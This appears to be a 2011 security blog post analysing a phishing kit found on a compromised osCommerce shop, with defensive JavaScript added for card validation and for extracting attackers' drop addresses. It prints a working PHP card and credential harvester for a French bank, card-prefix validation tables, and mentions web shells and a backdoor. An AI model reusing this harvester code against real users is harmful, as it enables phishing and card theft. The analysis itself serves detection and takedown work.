Sunday, April 17, 2011

hacked pages and spam

Another day goes by, another guy reports a hacked website, this time with new spam scripts. The vulnerable site was running an old version of osCommerce, and several different attackers had been through it in the preceding days. What was added to the site was mainly phishing templates for AOL, BofA and others. Interestingly, most of the scripts refer to one website, http://maroc-spam.net, which has a really badly done web template. Guys, if you are making phishing sites and promoting yours there, at least make the template look better.

Looking at the AOL files ( http://www.deventum.com/research/Aol.zip ) we can find the list of cards the phishing page accepts, together with the lengths and prefixes it validates them against, e.g.:

cards [0] = {name: "Visa",
             length: "13,16",
             prefixes: "4",
             checkdigit: true};
cards [1] = {name: "MasterCard",
             length: "16",
             prefixes: "51,52,53,54,55",
             checkdigit: true};
cards [2] = {name: "DinersClub",
             length: "14,16",
             prefixes: "300,301,302,303,304,305,36,38,55",
             checkdigit: true};
cards [3] = {name: "CarteBlanche",
             length: "14",
             prefixes: "300,301,302,303,304,305,36,38",
             checkdigit: true};
cards [4] = {name: "AmEx",
             length: "15",
             prefixes: "34,37",
             checkdigit: true};
cards [5] = {name: "Discover",
             length: "16",
             prefixes: "6011,650",
             checkdigit: true};
cards [6] = {name: "JCB",
             length: "15,16",
             prefixes: "3,1800,2131",
             checkdigit: true};
cards [7] = {name: "enRoute",
             length: "15",
             prefixes: "2014,2149",
             checkdigit: true};
cards [8] = {name: "Solo",
             length: "16,18,19",
             prefixes: "6334, 6767",
             checkdigit: true};
cards [9] = {name: "Switch",
             length: "16,18,19",
             prefixes: "4903,4905,4911,4936,564182,633110,6333,6759",
             checkdigit: true};
cards [10] = {name: "Maestro",
             length: "16,18",
             prefixes: "5020,6",
             checkdigit: true};
cards [11] = {name: "VisaElectron",
             length: "16",
             prefixes: "417500,4917,4913",
             checkdigit: true};
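The `checkdigit: true` entries mean the kit does not just look at length and prefix but also runs the Luhn mod-10 check (the standard card check digit) on the number the victim types, so obviously bogus numbers never reach the drop mailbox. The following is an added example, not the kit's own code, of what that validation amounts to. It uses a subset of the table above and assumes, as the table layout suggests, that the first matching entry wins; the numbers in the usage lines are the well-known industry test PANs, not real cards.

```javascript
// Added example (not the phishing kit's code): length + prefix + Luhn check
// driven by a table in the same layout the kit ships. Subset of the kit's
// table; assumption: first matching entry wins.
const cards = [
  { name: "Visa",       length: "13,16", prefixes: "4",              checkdigit: true },
  { name: "MasterCard", length: "16",    prefixes: "51,52,53,54,55", checkdigit: true },
  { name: "AmEx",       length: "15",    prefixes: "34,37",          checkdigit: true },
  { name: "Discover",   length: "16",    prefixes: "6011,650",       checkdigit: true },
  { name: "Maestro",    length: "16,18", prefixes: "5020,6",         checkdigit: true },
];

// Luhn mod-10: from the right, double every second digit, subtract 9 when the
// result exceeds 9, sum all digits; a valid PAN sums to a multiple of 10.
function luhnValid(digits) {
  let sum = 0;
  let doubleIt = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (doubleIt) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    doubleIt = !doubleIt;
  }
  return sum % 10 === 0;
}

// Returns { name, reason } with reason "ok" or "checkdigit" (length and
// prefix matched but Luhn failed), or null when no table entry matches.
function classifyCard(input, table = cards) {
  const digits = input.replace(/[\s-]/g, "");
  if (!/^\d+$/.test(digits)) return null;
  for (const card of table) {
    const lengths = card.length.split(",").map((s) => Number(s.trim()));
    const prefixes = card.prefixes.split(",").map((s) => s.trim());
    if (!lengths.includes(digits.length)) continue;
    if (!prefixes.some((p) => digits.startsWith(p))) continue;
    if (card.checkdigit && !luhnValid(digits)) {
      return { name: card.name, reason: "checkdigit" };
    }
    return { name: card.name, reason: "ok" };
  }
  return null;
}

// Usage with industry test numbers (constructed input, not real cards).
for (const n of ["4111 1111 1111 1111", "4111111111111112", "378282246310005", "6011111111111117"]) {
  console.log(n, "->", JSON.stringify(classifyCard(n)));
}
```

Note that Discover sits before Maestro in the table; with "6" as a Maestro prefix, table order is what keeps a 6011... number classified as Discover, which is why the order of entries in the kit's table matters.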

Only one file is base64 encoded, and the decoded output contains the address the harvested information is mailed to, defined as: $mail ="golobaz@voila.fr";

Another directory, named www.poste.it, holds a phishing template for the poste.it website. Again there is only one encoded file, containing the recipient of the details gathered:

$usip = $_SERVER['REMOTE_ADDR'];
$mail = "golobaz@voila.fr";
$subj = "Posteitaliane Utente ";

An interesting script that seems to be written specifically for osCommerce installations, since it gathers data from the application's configuration files and database, is Thumbs.db.php ( http://www.deventum.com/research/Thumbs.db.php.gz ). The name is presumably chosen to look like the Windows thumbnail cache file so that it does not stand out in a directory listing.

More scripts: slq.php ( http://www.deventum.com/research/slq.php.gz ) is a MySQL interface, or as it describes itself “MySQL Interface (Developed By Mohajer22)”, with a hardcoded username and password:

$PASSWORD = "root_xhahax";
$USERNAME = "xhahax";

Another PHP web shell, “Web Shell by oRb”, sits under the name account_manage.php; it is a modified version of the c99 shell with a slightly better interface.

The usual mass-mailing scripts, this time “Made By Mo$`Craci|a`”, and one more backdoor under the name cookie_usage.php (a file name that exists in a stock osCommerce install, so it blends in) that lets an attacker log in as administrator by posting a crafted request.

The BofA (Bank of America) phishing template sends the information gathered to the following address:

$send="latesayee800@blumail.org";
$subject = "Fresh BOFA Rezult | $user | $ip";
$headers = "From: alsa7r >";

Also, inside style.css, which is not a stylesheet at all but a PHP fragment holding a second set of recipients (presumably included from the mailer script), we have

<?
$IP = 'm4rk0l30p4rd@yahoo.com,m4rk0l30p4rd@hotmail.com';
?>

And finally a phishing template for www.caisse-epargne.fr, which under confirm_fichiers/ScriptResource_013.axd (named like an ASP.NET script resource so that it looks like part of the genuine site) again holds a base64 encoded script that decodes to the following. Note that the POST field names are the real site's ASP.NET control IDs, that the card number, expiry date and CVV are collected through the fields the genuine form uses for telephone numbers, and that after mailing the data the victim is redirected to the real login page:

$message  = "-----------------------------------------\n";
$message .= "--------------+ Login Info +-------------\n";
$message .= "-----------------------------------------\n";
$message .= "Nom complet : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbPrenom']." ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbNom']."\n";
$message .= "Identifiant Client : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbInternaute']."\n";
$message .= "Date de naiscance : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbDateNaissance']."\n"; include 'confirm_fichiers/ScriptResource_012.axd';
$message .= "Email : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbEmail']."\n";
$message .= "-----------------------------------------\n";
$message .= "Adresse : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbAdresse']."\n";
$message .= "ville : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbVille']."\n";
$message .= "code postal : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbCP']."\n";
$message .= "-----------------------------------------\n";
$message .= "CC number : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephoneBureau']."\n";
$message .= "exp date : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephoneMobile']."\n";
$message .= "cvv : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephone']."\n";
$message .= "-----------------------------------------\n";
$message .= "--------------+ Made By REDHATTeam +------------\n";
$message .= "--------------+ Thnx My Redhatteam +------------\n";
$message .= "-----------------------------------------\n";

$send="golobaz@voila.fr";

$subject = "Bravo | $login";

$headers = "From: REdhatteam - maroc-spam.net";

mail($send,$subject,$message,$headers);

header("Location: https://www.caisse-epargne.fr/pauth.aspx?");
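Every template above hides its recipient the same way: a `$mail`, `$send` or `$IP` string, sometimes buried under `eval(base64_decode("..."))`, and in one case inside a file pretending to be a stylesheet. The following is an added triage helper, not part of the kit or of the original post, that pulls those drop addresses out of a set of kit files and flags which files use the eval/base64 wrapper. It runs on Node.js (it uses `Buffer`); the sample "files" at the bottom are constructed here to mirror the findings on this page and are not the kit's actual files.

```javascript
// Added example, not the phishing kit's code: find drop-mail addresses in
// kit files, including ones hidden behind eval(base64_decode("...")),
// possibly nested, and report which files use that wrapper.

const EMAIL_RE = /[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}/g;
const B64_RE = /[A-Za-z0-9+\/]{32,}={0,2}/g;   // long base64 runs only
const OBFUSCATION_RE = /eval\s*\(\s*base64_decode/i;
const MAX_DEPTH = 4;                            // kits sometimes nest encodings

// Share of characters that are printable ASCII or whitespace; used to skip
// base64 runs that decode to binary garbage rather than PHP source.
function printableRatio(s) {
  if (s.length === 0) return 0;
  let ok = 0;
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    if ((c >= 32 && c < 127) || c === 9 || c === 10 || c === 13) ok++;
  }
  return ok / s.length;
}

// Collect e-mail addresses from text, then decode every base64 run in it and
// recurse, so a recipient buried two layers deep is still found.
function harvest(text, depth, out) {
  for (const m of text.match(EMAIL_RE) || []) out.add(m);
  if (depth >= MAX_DEPTH) return;
  for (const blob of text.match(B64_RE) || []) {
    const decoded = Buffer.from(blob, "base64").toString("latin1");
    if (printableRatio(decoded) < 0.9) continue;
    harvest(decoded, depth + 1, out);
  }
}

// files: { "path/in/kit": "file contents" } -> per-file report
function findDropAddresses(files) {
  const report = {};
  for (const [path, body] of Object.entries(files)) {
    const emails = new Set();
    harvest(body, 0, emails);
    report[path] = {
      emails: [...emails].sort(),
      obfuscated: OBFUSCATION_RE.test(body),
    };
  }
  return report;
}

// --- constructed sample kit (mirrors the page's findings, not real files) ---
function wrapInBase64Eval(php) {
  const b64 = Buffer.from(php, "latin1").toString("base64");
  return `<?php eval(base64_decode("${b64}")); ?>`;
}

const sampleKit = {
  "Aol/send.php": wrapInBase64Eval(
    '$mail ="golobaz@voila.fr";\nmail($mail,$subj,$message);'
  ),
  "Bofa/index.php":
    '<?php\n$send="latesayee800@blumail.org";\n$subject = "Fresh BOFA Rezult | $user | $ip";\n?>',
  "Bofa/style.css":
    "<?\n$IP = 'm4rk0l30p4rd@yahoo.com,m4rk0l30p4rd@hotmail.com';\n?>",
  // wrapped twice, as a kit might do to defeat a single-pass decoder
  "confirm_fichiers/ScriptResource_013.axd": wrapInBase64Eval(
    wrapInBase64Eval('$send="golobaz@voila.fr";')
  ),
};

for (const [path, r] of Object.entries(findDropAddresses(sampleKit))) {
  const tag = r.obfuscated ? "  [eval/base64]" : "";
  console.log(`${path}: ${r.emails.join(", ") || "(none)"}${tag}`);
}
```

The point of the printable-ratio guard is that any long run of base64-looking characters (hashes, minified assets) would otherwise be "decoded" and searched; in practice, on a real kit, point `findDropAddresses` at the unpacked directory and the handful of addresses that come back are what you block at the mail gateway and report to the providers.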
